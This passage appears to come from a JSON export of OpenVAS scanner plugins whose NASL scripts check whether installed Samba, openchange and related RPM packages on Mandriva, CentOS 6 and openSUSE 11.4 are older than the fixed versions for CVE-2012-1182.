((res = isrpmvuln(pkg:\"lib64talloc1\", rpm:\"lib64talloc1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64talloc-devel\", rpm:\"lib64talloc-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64tdb1\", rpm:\"lib64tdb1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64tdb-devel\", rpm:\"lib64tdb-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T11:09:26", "description": "Check for the Version of openchange", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for openchange CESA-2013:0515 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-26T00:00:00", "id": "OPENVAS:881680", "href": "http://plugins.openvas.org/nasl.php?oid=881680", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openchange CESA-2013:0515 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n \n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n \n This update also fixes the following bugs:\n \n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n \n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n \n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\";\n\n\ntag_affected = \"openchange on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019453.html\");\n script_id(881680);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:02:45 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0515\");\n script_name(\"CentOS Update for openchange CESA-2013:0515 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openchange\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openchange\", rpm:\"openchange~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-client\", rpm:\"openchange-client~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-devel\", rpm:\"openchange-devel~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-devel-docs\", rpm:\"openchange-devel-docs~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-31T18:42:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-08-02T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for samba (openSUSE-SU-2012:0508-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850289", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850289", "sourceData": "# Copyright (C) 2012 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850289\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-08-02 23:28:59 +0530 (Thu, 02 Aug 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"openSUSE-SU\", value:\"2012:0508-1\");\n script_name(\"openSUSE: Security Advisory for samba (openSUSE-SU-2012:0508-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.4\");\n\n script_tag(name:\"affected\", value:\"update on openSUSE 11.4\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"insight\", value:\"Samba upgrade to version 3.6.3 fixes the following\n security issue:\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. Remove attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\n Please see /usr/share/doc/packages/samba/WHATSNEW.txt from\n the samba-doc package or the package change log (rpm -q\n\n - -changelog samba) for more details of the version update.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"ldapsmb\", rpm:\"ldapsmb~1.34b~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libldb-devel\", rpm:\"libldb-devel~1.0.2~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libldb1\", rpm:\"libldb1~1.0.2~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libldb1-debuginfo\", rpm:\"libldb1-debuginfo~1.0.2~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi0-debuginfo\", rpm:\"libnetapi0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0-debuginfo\", rpm:\"libsmbclient0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbsharemodes0-debuginfo\", rpm:\"libsmbsharemodes0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtalloc-devel\", rpm:\"libtalloc-devel~2.0.5~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtalloc2\", rpm:\"libtalloc2~2.0.5~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtalloc2-debuginfo\", rpm:\"libtalloc2-debuginfo~2.0.5~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtdb-devel\", rpm:\"libtdb-devel~1.2.9~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~1.2.9~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtdb1-debuginfo\", rpm:\"libtdb1-debuginfo~1.2.9~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent-devel\", rpm:\"libtevent-devel~0.9.11~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent0\", rpm:\"libtevent0~0.9.11~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent0-debuginfo\", rpm:\"libtevent0-debuginfo~0.9.11~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-debuginfo\", rpm:\"libwbclient0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-debuginfo\", rpm:\"samba-client-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-debugsource\", rpm:\"samba-debugsource~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-devel\", rpm:\"samba-devel~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-krb-printing\", rpm:\"samba-krb-printing~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-krb-printing-debuginfo\", rpm:\"samba-krb-printing-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-debuginfo\", rpm:\"samba-winbind-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libldb1-32bit\", rpm:\"libldb1-32bit~1.0.2~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libldb1-debuginfo-32bit\", rpm:\"libldb1-debuginfo-32bit~1.0.2~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-32bit\", rpm:\"libsmbclient0-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtalloc2-32bit\", rpm:\"libtalloc2-32bit~2.0.5~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtalloc2-debuginfo-32bit\", rpm:\"libtalloc2-debuginfo-32bit~2.0.5~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtdb1-32bit\", rpm:\"libtdb1-32bit~1.2.9~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtdb1-debuginfo-32bit\", rpm:\"libtdb1-debuginfo-32bit~1.2.9~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent0-32bit\", rpm:\"libtevent0-32bit~0.9.11~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent0-debuginfo-32bit\", rpm:\"libtevent0-debuginfo-32bit~0.9.11~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-debuginfo-32bit\", rpm:\"libwbclient0-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-debuginfo-32bit\", rpm:\"samba-client-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-debuginfo-32bit\", rpm:\"samba-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-debuginfo-32bit\", rpm:\"samba-winbind-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libldb1-debuginfo-x86\", rpm:\"libldb1-debuginfo-x86~1.0.2~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libldb1-x86\", rpm:\"libldb1-x86~1.0.2~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-x86\", rpm:\"libsmbclient0-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0-x86\", rpm:\"libsmbclient0-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtalloc2-debuginfo-x86\", rpm:\"libtalloc2-debuginfo-x86~2.0.5~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtalloc2-x86\", rpm:\"libtalloc2-x86~2.0.5~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtdb1-debuginfo-x86\", rpm:\"libtdb1-debuginfo-x86~1.2.9~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtdb1-x86\", rpm:\"libtdb1-x86~1.2.9~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent0-debuginfo-x86\", rpm:\"libtevent0-debuginfo-x86~0.9.11~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent0-x86\", rpm:\"libtevent0-x86~0.9.11~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-debuginfo-x86\", rpm:\"libwbclient0-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-x86\", rpm:\"libwbclient0-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-debuginfo-x86\", rpm:\"samba-client-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-x86\", rpm:\"samba-client-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-debuginfo-x86\", rpm:\"samba-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-debuginfo-x86\", rpm:\"samba-winbind-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-x86\", rpm:\"samba-winbind-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-x86\", rpm:\"samba-x86~3.6.3~112.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-23T13:10:11", "description": "Check for the Version of samba4", "cvss3": {}, "published": "2013-02-22T00:00:00", 